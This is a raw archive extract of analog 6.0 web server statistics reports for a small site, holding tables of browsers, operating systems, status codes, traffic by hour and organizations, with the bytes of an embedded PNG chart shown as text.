Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5</td></tr> <tr><td class="R">2</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">99</td><td class="P">50</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">91</td><td class="P">42</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">8</td><td class="P">8</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">42</td><td class="P">32</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">6</td><td class="P">6</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr><td class="N">4</td><td class="R">4</td><td class="P">4</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">5</td><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla</td></tr> <tr><td class="N">6</td><td class="R">2</td><td class="P">2</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">7</td><td class="R">3</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N"> </td><td class="R">3</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">55</td><td class="P">40</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">41</td><td class="P">25</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">41</td><td class="P">25</td><td class="xl"> Linux</td></tr> <tr><td class="N">3</td><td class="R">24</td><td class="P">16</td><td class="xl">Macintosh</td></tr> <tr><td class="N">4</td><td class="R">41</td><td class="P">16</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">34</td><td class="P">13</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">3</td><td class="xl"> Unknown Windows</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">168</td><td class="xl">200 OK</td></tr> <tr><td class="R">20</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">91</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">13</td><td class="b"> 0.79%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">110</td><td class="b">45.97%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">45</td><td class="b">53.24%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">104</td><td class="b">57.47%</td><td class="xl">[directories]</td></tr> <tr><td class="R">29</td><td class="b">27.88%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">11</td><td class="b">10.51%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">11</td><td class="b"> 3.36%</td><td class="xl">.svg</td></tr> <tr><td class="R">13</td><td class="b"> 0.79%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">104</td><td class="b">57.47%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">51</td><td class="b">41.74%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">13</td><td class="b"> 0.79%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">104</td><td class="b">57.47%</td><td class="D">Aug/30/25 10:31 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">17</td><td class="b"> 9.72%</td><td class="D">Aug/29/25 5:28 AM</td><td class="xl"> <a href="/?192.175.111.253">/?192.175.111.253</a></td></tr> <tr><td class="R">64</td><td class="b">42.53%</td><td class="D">Aug/21/25 7:41 PM</td><td class="xl">[not listed: 10 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[�;� x x os.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx���Mr�6`��G����|�L�-��7^'+_?$ ��E�@�_\�B��'��H���!!�]���.ԓ'��������YZ�<�XFB�[��( !Z��, �D���"X@�`, �D���"X@�`, �c����܀��'��˘�o���.ư�X�|����?�W�,=��b�_]���w�]]��p,3�Z`��EK���$V7�w�� ��� ��u1��F��0�yk5����{�CA�t�*�uf�[ Vh�Xg��H� �`��$���3��b8�T��c��GT��U��S"V���X�ڲ�u� yDhX��JcQjk�Ҧ�R�$a�+�E���QM3!�+e�����kL�X���a�k+��}bT�Uc����R�������uV�)5������ͽ-��f�r�5�r���O�Ԃ��<Vf�XV�2���2���,�����+3��� �X��,��r-��,����r�E�bs�&��m, ��5�������Ic �� �����di�8ֵ���q{'��?R��s8b�`*����X�� �`�e�X�A䲲�՝�j�UK`Ѧ��k��=��=,3 ,�¢bŖ�|e��iJL����X��%X�aU8��)$cE�p�r�o�yϛ�=Q,�¢c���G�ª)Q,�ұ�6�"=-��_Z1���k�����������"�ZZ_]��� �#q�/� �5yxU��`����`��p��7� Kۛ@�B�K���尾H%�'�n�k���OQ c�8,R�#X�9�`����k���,!i,J��5J5�B+*,Bm������_C�a�Kk�2z�U���X�ڂ��Kk^��˲�(�)V��v�*?!,=����U���<V��k�[�4����°�>MC�J�����S�)yk9��:�}�-�!4�T��{Z�Z$b%j�X���S���֕��-kYZ#��?o�+Z[�au��;R�Y-c�T y������'��_bߛ9������� VV��P�Ei�:�} ��C�c�B@ +R[{b�w�N�T1o S!��Fk�Z���鱊;��`�����g�����2aK~7��a�J�F��bJ��X�a��`�zOi�X��,����#c��=P[0V� �kQ[�Ԗ`Z��˫`)��fR�8V��ÍX���|�`ѱ��,� � ��-�"��W��U�0-�"k #X@^��Os\,����U�9YY@n�|�����`Qc���E�H�� ����+t���o����U�`+x���y,�d}�`�sx4���`�3�B� �%G�[�j=C� ��*X6��I>/���:��J��Y[�s�+�����U�� ZAsx�Ձ��X�� �;<��V�N֘�`��B�� X�r,���9�=�ª�``���s� +6�i+:V�SH�J��`�V�����Y+*VŕE�i����=�J�hBh�a�>_� V�N���4+�ּ�(?�6���X��7��Xӆ'�;yk�ܯ�A�(XU/��@H�C�X��NĪz �X�ա�P+Biq��p�Ӱꮬį��&7�u/�8\X��қ�rsX�F�&�V�kg��r��w��} �X�����`!�b�?��Oak��J`U��v�J�!g�msǪ XۖV����;V��xcm���)La�;�Vk�Ҋ`qXX�cE氘�~yKRX ?��b���X�Z+8�+��eCX<��Bsx�Ms��1�9�}�šPe��WXL�0��e�s�d X��ta=�Kc�6�օ��"`�5�b�X$,|O,������Ұ�A���!$biP�±�����RT,��NK���ں0,,E��j�°�����R V['~��,e�I�� �!���I��A�a�x��^�P ,�$^8ΠB��� xR�XJ�GѰ�.(VvyV���������,����M����l�긞���lƲ��������rV ��K��@, �D���"X@�`, �D���~'�1�g�ɧ�˳ z��/^^��/x*�\�b���Kb���؏���4�&r�Mn�����57� �V���Y�έ�������s�X����7��;s=�X7����Z�ks~���7�PY�~{=���_�V�c~��Ň�k��ӸE4�Bw;Ǎ�']ܵ5����Y}�F����r���7�.�m�k��r{�,�ܺX` צ&X�a�����j�������f�<0,�iwÆ��\y���]��,5�2�+��s��T k��W2ٟG&�eos?2���Ո����>��(�t�v���]`�o��~~gX� ��y� ���f:[O �2�#��k�1)x�tt3\��%e��C���V�uN^ �M��O{�@�Lܯ[���W�둴�Ρ=݉܁�]�x������wynH�`, �D���"X@�`, �D���Ⰼ���MB�S����;QK~�)YX�<)YX�a{u�o�� IEND�B`�PK HG�[���[� � 7.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Wed, Jul 30 2025 at 12:28 PM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Tue, Jul 29 2025 at 2:01 PM (37.78 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Jul 30 2025 at 12:28 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 109 (14) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 68 (14) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (1) <br /><span class="gensumtitle">Failed requests:</span> 60 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 11 (38) <br /><span class="gensumtitle">Distinct hosts served:</span> 59 (74) <br /><span class="gensumtitle">Data transferred:</span> 87.53 kilobytes (10.33 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.32 kilobytes (1.48 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">36</td><td class="P">32</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2025 (36 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">15</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Tue</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Fri</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">69</td><td class="P">28</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 1</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 2</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 3</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 4</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 5</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 6</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 7</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 9</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">13</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">14</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">17</td><td class="R">6</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">18</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">19</td><td class="R">32</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">24</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">23</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">109</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">18</td><td class="b">20.13%</td><td class="xl">205.169</td></tr> <tr><td class="R">12</td><td class="b">10.38%</td><td class="xl">34</td></tr> <tr><td class="R">10</td><td class="b">11.13%</td><td class="xl">35</td></tr> <tr><td class="R">10</td><td class="b">11.13%</td><td class="xl">54</td></tr> <tr><td class="R">8</td><td class="b"> 5.50%</td><td class="xl">167.94</td></tr> <tr><td class="R">6</td><td class="b"> 5.57%</td><td class="xl">123</td></tr> <tr><td class="R">6</td><td class="b"> 4.12%</td><td class="xl">206.168</td></tr> <tr><td class="R">4</td><td class="b"> 5.65%</td><td class="xl">198.235</td></tr> 